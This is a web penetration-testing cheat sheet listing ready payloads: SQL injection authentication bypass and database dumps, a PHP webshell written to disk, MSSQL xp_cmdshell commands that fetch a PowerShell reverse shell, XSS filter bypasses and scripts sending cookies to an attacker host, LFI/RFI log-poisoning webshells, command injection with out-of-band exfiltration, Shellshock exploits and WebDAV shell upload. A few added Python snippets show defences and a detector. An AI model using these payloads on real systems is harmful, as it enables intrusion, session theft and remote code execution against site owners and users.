-> Bypass Authentication
' or 1=1 -- -
admin' -- -
' or 1=1 order by 2 -- -
' or 1=1 order by 1 desc -- -
' or 1=1 limit 1,1 -- -
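Added example (not from the original cheat sheet): the authentication-bypass payloads above run against a constructed SQLite users table, once through string concatenation and once through a parameterized query, to show exactly what the bypass depends on. The table contents and the two login functions are assumptions.

```python
import sqlite3


def make_db():
    """Constructed in-memory users table (sample data, not from the page)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "admin", "s3cret"), (2, "alice", "hunter2")])
    return conn


def login_vulnerable(conn, username, password):
    """String concatenation: the quote in the payload closes the literal,
    'or 1=1' makes the WHERE clause true, and '-- -' comments out the rest.
    'limit 1,1' then selects the second row, which is why the page lists it."""
    query = ("SELECT username FROM users WHERE username='%s' AND password='%s'"
             % (username, password))
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Parameterized query: the driver passes the payload as a plain string value,
    so there is no SQL for the quote or the comment sequence to break out of."""
    row = conn.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    for payload in ["' or 1=1 -- -", "admin' -- -", "' or 1=1 limit 1,1 -- -"]:
        print(repr(payload), "-> concatenated:", login_vulnerable(db, payload, "x"),
              "| parameterized:", login_safe(db, payload, "x"))
```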
-> get number columns
-1 order by 3;#
-> get version
-1 union select 1,2,version();#
-> get database name
-1 union select 1,2,database();#
-> get table name
-1 union select 1,2, group_concat(table_name) from information_schema.tables where table_schema="<database_name>";#
-> get column name
-1 union select 1,2, group_concat(column_name) from information_schema.columns where table_schema="<database_name>" and table_name="<table_name>";#
-> dump
-1 union select 1,2, group_concat(<column_names>) from <database_name>.<table_name>;#
-> view web server path
LOAD_FILE('/etc/httpd/conf/httpd.conf')
-> creating webshell
select "<?php system($_GET['cmd']);?>" into outfile "/var/www/html/shell.php";
e.g.
SELECT LOAD_FILE('/etc/passwd')
-> Bypass Authentication
' or 1=1--
-> get number columns
' order by 3--
-> get table name
' union select null,table_name,null from all_tables--
-> get column name
' union select null,column_name,null from all_tab_columns where table_name='<table_name>'--
-> dump
' union select null,PASSWORD||USER_ID||USER_NAME,null from WEB_USERS--
-> extracting table names, not displaying standard sqlite tables
http://site.com/index.php?id=-1 union select 1,2,3,group_concat(tbl_name),4 FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'--
-> extracting table users
http://site.com/index.php?id=-1 union select 1,2,3,group_concat(password),5 FROM users--
-> Reference
-> Bypass Authentication
' or 1=1--
-> get version+delay
' SELECT @@version; WAITFOR DELAY '00:00:10'; --
-> Enable xp_cmdshell
' UNION SELECT 1, null; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;--
-> RCE
' exec xp_cmdshell "powershell IEX (New-Object Net.WebClient).DownloadString('http://<ip>/InvokePowerShellTcp.ps1')" ;--
-> edit Invoke-PowerShellTcp.ps1, adding this:
Invoke-PowerShellTcp -Reverse -IPAddress 192.168.254.226 -Port 4444
impacket-mssqlclient <user>@<ip> -db <database>
xp_cmdshell powershell IEX(New-Object Net.webclient).downloadString(\"http://<IP>/Invoke-PowerShellTcp.ps1\")
1-> Identify the language and frameworks used
2-> Identify entry points (parameters, inputs, responses reflecting values you can control, etc.)
3-> Check how this is reflected in the response via source code preview or browser developer tools
4-> Check the allowed special characters
< > ' " { } ;
5-> Detect whether filters or blocks are in place and adjust the payload until it works
- https://raw.githubusercontent.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/main/wordlists/xss_bypass.txt
- https://gist.githubusercontent.com/rvrsh3ll/09a8b933291f9f98e8ec/raw/535cd1a9cefb221dd9de6965e87ca8a9eb5dc320/xxsfilterbypass.lst
- https://raw.githubusercontent.com/danielmiessler/SecLists/master/Fuzzing/XSS/XSS-Bypass-Strings-BruteLogic.txt
- https://raw.githubusercontent.com/payloadbox/xss-payload-list/master/Intruder/xss-payload-list.txt
- https://raw.githubusercontent.com/danielmiessler/SecLists/master/Fuzzing/XSS/XSS-Cheat-Sheet-PortSwigger.txt
- https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xss.md
- https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html
- https://www.chromium.org/developers/design-documents/xss-auditor/
- https://portswigger.net/daily-swig/xss-protection-disappears-from-microsoft-edge
- https://developer.mozilla.org/pt-BR/docs/Web/HTTP/Headers/X-XSS-Protection
- https://rapid7.com/blog/post/2012/02/21/metasploit-javascript-keylogger/
- https://github.com/hadynz/xss-keylogger
-> Filter blocking on - Bypass
(on\w+\s*=)
<svg onload%09=alert(1)>
<svg %09onload%20=alert(1)>
<svg onload%09%20%28%2C%3B=alert(1)>
<svg onload%0B=alert(1)>
<script>\u0061lert(1)</script>
<script>\u0061\u006C\u0065\u0072\u0074(1)</script>
<script>eval("\u0061lert(1)")</script>
<script>eval("\u0061\u006C\u0065\u0072\u0074\u0028\u0031\u0029")</script>
<sCR<script>iPt>alert(1)</SCr</script>IPt>
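Added example (not the page's code): the four `on…=` payloads above are run through the `(on\w+\s*=)` blocklist as deployed and then after URL-decoding, and the nested `<sCR<script>iPt>` payload through a single-pass strip and a fixed-point strip; the last function is the output encoding that makes the blocklist unnecessary. Function names are assumptions.

```python
import html
import re
from urllib.parse import unquote

# The blocklist shown above: (on\w+\s*=), applied to the raw request value.
HANDLER_RE = re.compile(r"on\w+\s*=", re.IGNORECASE)
SCRIPT_TAG_RE = re.compile(r"</?script>", re.IGNORECASE)


def blocked_by_raw_regex(value):
    """The filter as deployed: one pass over the still URL-encoded input, so the
    literal "%09" between "onload" and "=" never looks like whitespace to \\s."""
    return bool(HANDLER_RE.search(value))


def blocked_after_normalizing(value):
    """Decode first, then accept any run of non-name characters before '=',
    which also covers the "(,;" separators that \\s would never have matched."""
    decoded = unquote(value)
    return bool(re.search(r"on\w+[^\w=]*=", decoded, re.IGNORECASE))


def strip_script_once(value):
    """Single-pass tag removal: the inner <script> is cut out and the characters
    around it join up into a fresh <script> tag."""
    return SCRIPT_TAG_RE.sub("", value)


def strip_script_to_fixpoint(value):
    """Repeat until nothing changes. Still a blocklist, so still not the real fix."""
    while True:
        stripped = SCRIPT_TAG_RE.sub("", value)
        if stripped == value:
            return value
        value = stripped


def render_safely(value):
    """What actually closes the hole for an HTML text context: encode the
    metacharacters of the output context instead of enumerating bad inputs."""
    return html.escape(value, quote=True)
```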
-> String.fromCharCode()
-> unescape
-> decode URI + unescape method (need eval)
decodeURI(/alert(%22xss%22)/.source)
decodeURIComponent(/alert(%22xss%22)/.source)
-> unicode
<img src=x onerror="\u0061\u006c\u0065\u0072\u0074(1)"/>
Add execution sink:
-> eval
-> setInterval
-> setTimeout
-> octal
<img src=x onerror="eval('\141lert(1)')"/>
-> hexadecimal
<img src=x onerror="setInterval('\x61lert(1)')"/>
-> mix (uni, hex, octa)
<img src=x onerror="setTimeout('\x61\154\145\x72\164\x28\x31\x29')"/>
- https://checkserp.com/encode/unicode/
- http://www.unit-conversion.info/texttools/octal/
- http://www.unit-conversion.info/texttools/hexadecimal/
<div>here</div>
->
<svg/onload=alert(1)
<input value="here"/></input>
->
" /><script>alert(1)</script>
<script>
var name="here";
</script>
->
";alert(1);//
<button onclick="here;">Okay!</button>
->
alert(1)
<script>var ok = location.search.replace("?ok=", "");domE1.innerHTML = "<a href=\'"+ok+"\'>ok</a>";</script>
->
javascript:alert(1)
-> jjencode
-> aaencode
-> jsfuck
-> Xchars.js
<img src=x onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>
<script>document.write('<iframe src=file:///etc/passwd></iframe>');</script>
-> Examples
<script>new Image().src="http://<IP>/ok.jpg?output="+document.cookie;</script>
<script type="text/javascript">document.location="http://<IP>/?cookie="+document.cookie;</script>
<script>window.location="http://<IP>/?cookie="+document.cookie;</script>
<script>document.location="http://<IP>/?cookie="+document.cookie;</script>
<script>fetch('http://<IP>/?cookie=' + btoa(document.cookie));</script>
git-dumper http://site.com/.git .
- Look for IDs in requests; if none are visible, create at least two accounts and analyse the requests that involve IDs
- Identify the access controls in the application
- Change the request method (GET, POST, PUT, DELETE, PATCH…)
- Search for old API versions (/api/v1/, /api/v2/, /api/v3/)
- Try sending a wildcard (*) instead of the ID, especially on search endpoints
- Brute-force IDs depending on context and predictability
GET /api/v1/messages?id=<Another_User_ID> # unauthorized
GET /api/v1/messages?id=<Your_User_ID>&id=<Another_User_ID> # authorized
GET /api/v1/messages?id[]=<Your_User_ID>&id[]=<Another_User_ID>
POST /api/v1/messages
{"user_id":<Your_User_ID>,"user_id":<Another_User_ID>}
-> with a JSON Object
POST /api/v1/messages
{"user_id":{"user_id":<Another_User_ID>}}
-> with array
{"user_id":001} #Unauthorized
{"user_id":[001]} #Authorized
GET /admin/profile #Unauthorized
GET /ADMIN/profile #Authorized
-> add .json if in ruby
/user/1029 # Unauthorized
/user/1029.json # Authorized
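Added example, not from the original page: a Python model of the parameter-pollution, duplicate-key, nested-object and array cases above, showing the vulnerable pattern (authorize the first id, serve the last) next to a handler that binds the lookup to the session and a JSON loader that refuses duplicate keys. The session user id and the handler names are assumptions.

```python
import json
from urllib.parse import parse_qs


def ids_from_query(query_string):
    """Every id the request carries: repeated ?id= keys and the id[] array form."""
    params = parse_qs(query_string)
    return [int(v) for v in params.get("id", []) + params.get("id[]", [])]


def messages_vulnerable(session_user, query_string):
    """Authorization checks the first id, the data layer uses the last one:
    the gap that ?id=<Your_User_ID>&id=<Another_User_ID> slips through."""
    ids = ids_from_query(query_string)
    if not ids or ids[0] != session_user:
        return None
    return ids[-1]          # user whose messages are actually fetched


def messages_hardened(session_user, query_string):
    """Exactly one id, and it must be the session's own; anything else is denied.
    The fetch then uses the session value, never the request value."""
    ids = ids_from_query(query_string)
    if len(ids) != 1 or ids[0] != session_user:
        return None
    return session_user


def load_json_strict(text):
    """json.loads keeps the LAST duplicate key while other parsers keep the first;
    refusing duplicates removes the disagreement. Returns None on any parse error."""
    def reject_duplicates(pairs):
        keys = [k for k, _ in pairs]
        if len(keys) != len(set(keys)):
            raise ValueError("duplicate key")
        return dict(pairs)
    try:
        return json.loads(text, object_pairs_hook=reject_duplicates)
    except ValueError:      # JSONDecodeError is a ValueError too
        return None


def messages_json_hardened(session_user, body):
    """Strict parse, then user_id must be a plain int equal to the session user:
    objects ({"user_id":{...}}) and arrays ([...]) are rejected, not coerced."""
    data = load_json_strict(body)
    if not isinstance(data, dict):
        return None
    value = data.get("user_id")
    if type(value) is not int or value != session_user:
        return None
    return session_user
```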
$language = str_replace('../', '', $_GET['file']);
/....//....//....//....//etc/passwd
..././..././..././..././etc/passwd
....\/....\/....\/....\/etc/passwd
-> urlencode and Double urlencode /etc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%36%35%25%37%34%25%36%33%25%32%66%25%37%30%25%36%31%25%37%33%25%37%33%25%37%37%25%36%34
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id
expect://id
php://filter/read=convert.base64-encode/resource=index.php
php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini
-> Predefined Paths
preg_match('/^\.\/okay\/.+$/', $_GET['file'])
./okay/../../../../etc/passwd
https://site.com/index.php?file=/etc/passwd%00.php
-> Removing .php
https://site.com/index.php?file=index.p.phphp
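Added example (not the page's code): the `str_replace('../', '', ...)` filter and the `^\./okay/.+$` prefix check above, re-implemented in Python and fed the payloads listed, next to a resolver that normalizes the joined path and refuses anything outside the allowed directory. The base directory is an assumption.

```python
import posixpath
import re

BASE_DIR = "/var/www/html/pages"   # assumption: the only directory the app may serve


def strip_traversal_once(name):
    """Mirrors str_replace('../', '', $_GET['file']): one non-recursive pass,
    so "....//" and "..././" collapse into the "../" they were meant to remove."""
    return name.replace("../", "")


def prefix_check(name):
    """Mirrors the preg_match('/^\\.\\/okay\\/.+$/') gate: it pins only the prefix,
    so "./okay/../../../../etc/passwd" passes."""
    return re.match(r"^\./okay/.+$", name) is not None


def resolve_confined(name, base_dir=BASE_DIR):
    """Join, normalize lexically, then require the result to stay under base_dir.
    Returns the resolved path or None. Absolute names (/etc/passwd) drop the base
    on join and are refused the same way. (Use os.path.realpath in production so
    symlinks are resolved as well; normpath keeps this example offline.)"""
    target = posixpath.normpath(posixpath.join(base_dir, name))
    if posixpath.commonpath([base_dir, target]) != base_dir:
        return None
    return target
```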
-> gif
echo 'GIF8<?php system($_GET["cmd"]); ?>' > ok.gif
-> zip
1-
echo '<?php system($_GET["cmd"]); ?>' > ok.php && zip wshell_zip.jpg ok.php
2-
http://ip/index.php?file=zip://./uploads/wshell_zip.jpg%23ok.php&cmd=id
https://raw.githubusercontent.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/main/codes/webshells/wshell_zip.jpg
-> apache
nc ip 80
<?php system($_GET['cmd']); ?>
or
1-
curl -s http://ip/index.php -A "<?php system(\$_GET['cmd']); ?>"
2-
http://ip/index.php?file=/var/log/apache2/access.log&cmd=id
-> SMTP
telnet ip 25
MAIL FROM: email@gmail.com
RCPT TO: <?php system($_GET['cmd']); ?>
http://ip/index.php?file=/var/mail/mail.log&cmd=id
-> SSH
ssh '<?php system($_GET["cmd"]);?>'@<IP>
http://ip/index.php?file=/var/log/auth.log&cmd=id
-> PHP session
http://ip/index.php?file=<?php system($_GET["cmd"]);?>
http://ip/index.php?file=/var/lib/php/sessions/sess_<your_session>&cmd=id
-> Other Paths
/var/log/nginx/access.log
/var/log/sshd.log
/var/log/vsftpd.log
/proc/self/fd/0-50
- https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/master/fuzzing/linux-lfi-fuzzing.yaml
- https://raw.githubusercontent.com/CharanRayudu/Custom-Nuclei-Templates/main/dir-traversal.yaml
-> burp-parameter-names.txt - Wordlist for parameter fuzzing
-> Wordlist LFI - Linux
-> Wordlist LFI - Windows
-> bypass_lfi.txt
- https://github.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/blob/main/wordlists/lfi_bypass.txt
-> poisoning.txt
echo '<?php echo shell_exec($_GET["cmd"]); ?>' > evil.txt
python -m http.server 80
http://site.com/menu.php?file=http://<IP>/evil.txt%00.png
echo '<?php echo shell_exec($_GET["cmd"]); ?>' > evil.txt
python -m http.server 80
http://site.com/menu.php?file=http://<IP>/evil.txt&cmd=ipconfig
-> Special Characters
& <command>
&& <command>
; <command>
<command> %0A <command>
| <command>
|| <command>
`<command>`
$(<command>)
-> Out Of Band - OOB Exploitation
curl http://$(whoami).site.com/
curl http://`whoami`.site.com/
nslookup `whoami`.attacker-server.com &
curl http://192.168.0.20/$(whoami)
-> Check if the commands are executed by PowerShell or CMD
(dir 2>&1 *`|echo CMD);&<# rem #>echo PowerShell
-> Detection
nikto -h <IP> -C all
-> Exploit
curl -A "() { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /bin/bash -c 'whoami'" <IP>
curl -A "() { :; };echo ;/bin/bash -c 'hostname'" <IP>
curl -A "() { :; }; /usr/bin/nslookup $(whoami).site.com" <IP>
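Added detection example (not from the page): a parser for combined-format access-log lines that flags the `() {` function-definition prefix the curl commands above place in User-Agent, run over constructed sample lines. The log lines and function names are constructed for this example.

```python
import re

# Constructed sample lines in Apache combined format (not real traffic): one
# ordinary browser request, then two carrying the function-definition prefix.
SAMPLE_LOG = r'''
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.9 - - [10/Oct/2023:13:55:40 +0000] "GET /cgi-bin/status HTTP/1.1" 200 64 "-" "() { :; };echo ;/bin/bash -c 'hostname'"
203.0.113.9 - - [10/Oct/2023:13:55:41 +0000] "GET /cgi-bin/status HTTP/1.1" 200 64 "-" "() { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /bin/bash -c 'whoami'"
'''.strip().splitlines()

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)
# A vulnerable bash treats an environment variable whose value starts with "() {"
# as a function definition; the whitespace is optional, so match it loosely.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")


def find_shellshock(lines):
    """Return (client ip, request path, field) for each line whose User-Agent,
    Referer or request line carries the function-definition prefix."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue            # not combined format: leave for another parser
        parts = m.group("req").split()
        path = parts[1] if len(parts) > 1 else m.group("req")
        for field in ("ua", "ref", "req"):
            if SHELLSHOCK_RE.search(m.group(field)):
                hits.append((m.group("ip"), path, field))
                break
    return hits


if __name__ == "__main__":
    for ip, path, field in find_shellshock(SAMPLE_LOG):
        print(f"shellshock probe from {ip} against {path} via {field}")
```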
-> Connect to WebDAV server and send malicious file to shell
cadaver http://<IP>/webdav
put <shell.asp>
curl -u "<user>:<password>" http://<IP>/webdav/shell.asp